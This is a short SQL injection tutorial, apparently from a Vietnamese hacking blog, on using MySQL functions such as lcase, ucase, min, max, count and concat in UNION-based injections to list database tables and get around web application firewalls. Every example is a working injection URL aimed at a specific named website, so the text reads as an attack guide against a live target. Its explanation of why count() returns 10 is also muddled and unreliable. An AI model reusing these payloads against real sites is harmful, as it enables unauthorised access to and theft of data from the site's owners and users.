SQL Injection - Useful Functions - Tutorial

Here are some useful function that you can use to speed up your injection and/or evade some WAFs.

If group_concat() or concat() are not available (or you can't bypass a WAF that filters out these functions) you can try and use this:

Mã:

http://www.iec.org.af/eng/content.php?id=4&cnid=-53 UNION SELECT 1,2,3,4,5,lcase(table_name),7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--

or

Mã:

http://www.iec.org.af/eng/content.php?id=4&cnid=-53 UNION SELECT 1,2,3,4,5,ucase(table_name),7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--

lcase() returns the lowercase value of the database/table/column names
ucase() returns the uppercase value of the database/table/column names

*Note: In some situations you'll have to use the limit 0,1 function along with these functions to get all of the database/table/column names.


Another useful thing is the max() and min() function. These functions will return the name of the first or last table/column name.

For example:

Mã:

http://www.iec.org.af/eng/content.php?id=4&cnid=-53 UNION SELECT 1,2,3,4,5,min(table_name),7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--

or

Mã:

http://www.iec.org.af/eng/content.php?id=4&cnid=-53 UNION SELECT 1,2,3,4,5,max(table_name),7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--

The next useful function is count(). When we're limited to the limit 0,1 function in most cases we'll have to manually increment the number in the limit function. Most sites contain the table "user" or something similar witch in most cases is located at the end of the table count (because tables/columns are alphabetically sorted). We can simply use the count() function to find out the number of tables/columns and use that number in the limit function.

For example: We first find out the number of tables:

Mã:

http://www.iec.org.af/eng/content.php?id=4&cnid=-53 UNION SELECT 1,2,3,4,5,count(table_name),7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--

Now we see the number 10 but that is not the real table count. The reason behind this is that the function count() counts 0,1,2,3,4,5,6,7,8,9 witch is 10. So the number that we use in the limit function is 9.
We proceede then with the concat() function:

Mã:

http://www.iec.org.af/eng/content.php?id=4&cnid=-53 UNION SELECT 1,2,3,4,5,concat(table_name),7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database() limit 9,1--

Chú Ý:

Coppy phải ghi rõ nguồn Dương-UG Blog's